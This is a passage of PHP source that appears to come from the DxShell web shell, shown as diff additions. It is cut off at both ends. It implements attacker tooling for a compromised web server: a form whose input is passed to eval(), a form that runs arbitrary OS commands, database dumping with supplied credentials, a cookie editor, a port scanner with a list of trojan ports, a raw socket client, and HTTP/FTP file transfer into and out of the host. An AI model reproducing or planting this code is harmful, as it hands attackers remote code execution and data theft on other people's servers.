"\n".'</td></tr></table>'; + } + +######## +######## SQL Dump +######## +if ($_GET['dxmode']=='SQLD') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):'; + print "\n".'<input type=text name="dxsql_q" style="width:100%;">'; + print "\n".'<br>'; + print "\n".'<div align=right>' + .'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10) + .'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + } + + ################################### + +######## +######## PHP Console +######## +if ($_GET['dxmode']=='PHP') + { + if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval']; + + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">'; + $PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>' + .( ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3) ); + print "\n\n".'</td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']]; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + eval($_POST['dxval']); + print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>'; + } + } + + ################################### + +######## +######## Cookies Maintenance +######## +if ($_GET['dxmode']=='COOK') + { + if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =('); print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s'); + + print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>'; + for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--) + { + if ($maxlen>100) $maxlen=100; + if ($maxlen<30) $maxlen=30; + $maxlen+=3; + for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++) + { + if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;} + print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>' + .'<td class=linelisting><input type=text ' + .'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $INDEXES[$i]).']" ' + .'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" ' + .'SIZE='.$maxlen.'></td>' + .'</tr>'; + } + if (!$look_len) + { + print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>'; + print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>' + .'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>' + .'</tr>'; print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">' + .'<input type=submit value="Save" class="submit" style="width:50%;">' + .'</td></tr>'; + } + } + print "\n".'</table></form>'; + } + + ################################### + +######## +######## Command line +######## +if ($_GET['dxmode']=='CMD') + { + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>'; + print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">'; + print "\n\t".'<OPTION></OPTION>'; + $PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>'; + print "\n\n".'</SELECT></td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { + $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']]; + } + + $warnstr=DxExecNahuj('',$trash1, $trash2); + if (!$warnstr[1]) DxWarning($warnstr[2]); + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Exec" class="submit" style="width:100pt;"> ' + .'</div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { + $_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval'])); + for ($i=0; $i<count($_POST['dxval']); $i++) + { + $CUR=$_POST['dxval'][$i]; + if (empty($CUR)) continue; + + DxExecNahuj($CUR,$OUT, $RET); + print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + + print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>'; + print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>'; + print '<br><nobr>'; + print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".( (is_array($RET))?implode("\n", $RET):$RET).'</textarea>'; + print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".( (is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>'; + print '</nobr>'; + print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>'; + } + } + } + + ################################### + +######## +######## String functions +######## +if ($_GET['dxmode']=='STR') + { + if (isset($_POST['dxval'], $_POST['dxparam'])) + { $crypted=''; + if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']); + if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']); + if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']); + if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']); + if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']); + if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' '; + if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));} + if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');} + if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']); + if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']); + } + if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = '; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5) + .'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> ' + .'</div>'; + print "\n".'</form>'; + } + +######## +######## Port scaner +######## +if ($_GET['dxmode']=='PRT') + { + print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>'; + if (isset($_POST['dxportscan']) or isset($_GET['dxparam'])) + $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',); + + if (isset($_GET['dxparam'])) + { print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>'; + $INDEXES=array_keys($DEF_PORTS); + for ($i=0;$i<count($INDEXES);$i++) + print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>'; + print "\n".'</table>'; + die(); + } + + if (isset($_POST['dxportscan'])) + { $OKAY_PORTS = 0; + $TOSCAN=array(); + + if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS); + else + { $_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']); + for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++) + { $_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]); + if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0]; + else + $TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]); + $_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]); + } + $_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']); + } + + print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>'; + list($usec, $sec) = explode(' ', microtime()); + $start=(float)$usec + (float)$sec; + for ($i=0;$i<count($TOSCAN);$i++) + { $cur_port=&$TOSCAN[$i]; + $fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']); + if ($fp) + { $OKAY_PORTS++; + $port_name=''; + if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port]; + print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>'; + } + } + list($usec, $sec) = explode(' ', microtime()); + $end=(float)$usec + (float)$sec; + + print "\n".'</table>'; + print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>'; + print "\n".'<br><hr>'."\n"; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0>' + .'<tr>' + .'<td colspan=2>' + .'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>' + .'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>' + .'</tr><tr>' + .'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>' + .'</td><td>' + .'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>' + .'<br><input type=submit value="Scan" class="submit" style="width:100pt;">' + .'</tr></table></form>'; + } + +######## +######## Raw s0cket +######## +if ($_GET['dxmode']=='SOCK') + { + $DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val')); + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">'; + print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>' + .' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=3>' + .'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>' + .'</td></tr>'; + print "\n".'<tr>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='HTML')?'CHECKED':'') :'CHECKED') ).'>HTML</td>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>' + .'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>' + .'</tr>'; + print "\n".'</table>'; + + if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die(); + + print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>'; + print "\n\n\n".'<tr><td class=listing>'; + + $fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']); + if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr)); + + if ($_POST['dxsock_type']=='TEXT') print '<plaintext>'; + + if (!empty($_POST['dxsock_request'])) fputs($fp, $_POST['dxsock_request']); + $ret=''; + while (!feof($fp)) $ret.=fgets($fp, 4096 ); + fclose( $fp ); + + if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE; + + if ($headers_over_place===FALSE) print $ret; + else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place); + + if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>'; + } + +######## +######## FTP, HTTP file transfers +######## +if ($_GET['dxmode']=='FTP') + { print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>'; + + print "\n".'<tr><td>'; /* HTTP GET */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">'; + print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP DOWNL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP UPL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>'; + print "\n".'</td></tr></table>'; + + if (isset($_POST['DxFTP_HTTP'])) { $URLPARSED=parse_url($_POST['DxFTP_HTTP']); $request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $GETFILE=''; + while (!feof($f)) $GETFILE.=fgets($f, 4096 ); + fclose( $f ); + + DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE); + } + + if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL'])) + { $DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']); + if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];} + if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection')); + if (!ftp_login($FTP, 